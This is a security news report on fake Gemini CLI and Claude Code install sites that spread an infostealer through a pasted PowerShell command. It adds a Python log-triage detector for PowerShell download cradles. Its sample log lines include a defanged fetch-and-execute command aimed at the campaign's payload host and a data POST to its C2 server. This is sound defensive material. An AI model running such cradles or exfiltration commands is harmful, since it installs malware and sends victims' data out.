Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
SEO poisoning campaigns are using fake websites impersonating Google Gemini and Anthropic Claude Code to distribute infostealer malware targeting enterprise credentials and crypto wallets.

Security researchers at EclecticIQ have uncovered a malicious campaign in which threat actors created fake websites posing as Google Gemini's coding tool and Anthropic's Claude Code to deliver information-stealing malware. The campaign, first flagged by independent researcher @g0njxa on April 21, 2026, uses SEO poisoning to rank malicious domains above legitimate results, luring developers searching for AI coding tools.
The attackers began registering domains in early March 2026, using top-level domains like .co.uk, .us.com, and .us.org to target users in the US and UK. The fake sites mimic official installation pages for Gemini CLI and Claude Code, prompting victims to copy and paste a PowerShell command into their terminal. This command fetches a downloader from attacker-controlled infrastructure, which in turn retrieves and runs the infostealer entirely in memory.
Once executed, the infostealer targets Windows endpoints and harvests credentials, session cookies, autofill data, and form history from Chromium-based browsers (Chrome, Edge, Brave) and Firefox. It also extracts data from enterprise collaboration platforms including Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, LiveChat, Notion, and Zoho Mail Desktop. EclecticIQ noted that a single session cookie or local state key from these platforms grants authenticated access to the victim's workspace, including internal channels and shared files.
The malware's collection scope extends to remote access tools, OpenVPN configuration files, cryptocurrency wallets (Brave Wallet, Spectre), cloud storage services (Proton Drive, iCloud Drive, Google Drive, MEGA, OneDrive), and general user files and system metadata. It also allows attackers to perform arbitrary remote code execution, enabling hands-on-keyboard intrusions against selected victims.
The Gemini CLI attack chain begins when victims visit geminicli[.]co[.]com, which displays a fake installation page. The PowerShell command downloads the payload from gemini-setup[.]com, and the infostealer exfiltrates data to C2 server events[.]msft23[.]com. For Claude Code, the attackers registered claudecode[.]co[.]com and claude-setup[.]com on March 30, using a similar pattern with C2 server events[.]ms709[.]com. The similarities between both attack chains strongly suggest a single threat actor is behind both campaigns.
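The copy-paste chain above leaves a footprint in PowerShell ScriptBlock logging (Event ID 4104). As an added example that is not part of EclecticIQ's report, the following Python triages log text for the fetch-then-execute pattern and for the infrastructure named in the article; the sample log lines and the `<placeholder>` URL paths are constructed.

```python
import re
from dataclasses import dataclass

# Infrastructure named in the report, refanged so it compares equal to log text.
CAMPAIGN_DOMAINS = {
    "geminicli.co.com", "gemini-setup.com", "events.msft23.com",
    "claudecode.co.com", "claude-setup.com", "events.ms709.com",
}
# Two halves of a "download cradle": fetch remote content, then execute it without
# writing a file. Either half alone is common in legitimate admin scripts.
FETCH_RE = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b"
                      r"|downloadstring|downloaddata|net\.webclient", re.I)
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b|-e(?:c|nc|ncodedcommand)\b", re.I)
# Loose host matcher; over-matching is harmless because hits are checked against a set.
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)

@dataclass
class Finding:
    line_no: int
    verdict: str             # "high", "medium" or "none"
    campaign_domains: list   # report indicators seen on this line
    fetch: bool
    execute: bool

def refang(text: str) -> str:
    """Undo the [.] / hxxp defanging used in reports and shared IoC lists."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def analyse_scriptblock(text: str, line_no: int = 0) -> Finding:
    t = refang(text)
    iocs = sorted({m.group(0).lower() for m in HOST_RE.finditer(t)} & CAMPAIGN_DOMAINS)
    fetch, execute = bool(FETCH_RE.search(t)), bool(EXEC_RE.search(t))
    if iocs or (fetch and execute):
        verdict = "high"      # known infrastructure, or a fetch piped straight into execution
    elif fetch or execute:
        verdict = "medium"    # half a cradle: worth triage, but expect benign hits
    else:
        verdict = "none"
    return Finding(line_no, verdict, iocs, fetch, execute)

def scan(lines):
    """Return a Finding for every line that scored above 'none'."""
    found = (analyse_scriptblock(l, i) for i, l in enumerate(lines, 1))
    return [f for f in found if f.verdict != "none"]

# Constructed sample ScriptBlock (Event ID 4104) text, not real telemetry.
SAMPLE_LOG = [
    "Get-ChildItem C:\\Users | Select-Object Name",
    "Invoke-WebRequest https://update.example.com/tool.msi -OutFile tool.msi",
    "iex (iwr 'https://gemini-setup[.]com/<placeholder>' -UseBasicParsing)",
    "Invoke-RestMethod https://events[.]ms709[.]com/<placeholder> -Method Post -Body $d",
]
```

`scan(SAMPLE_LOG)` leaves the directory listing alone, rates the plain file download "medium", and rates both campaign-domain lines "high"; the same function can be pointed at exported 4104 events or EDR command-line telemetry.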
EclecticIQ assessed that the campaign is geographically tailored to target US and UK users, given the choice of TLDs. The infostealer's deliberate focus on enterprise users and developer workstations highlights the growing threat of SEO poisoning as a vector for delivering sophisticated malware. Organizations should educate developers to verify download sources and avoid executing commands from untrusted websites.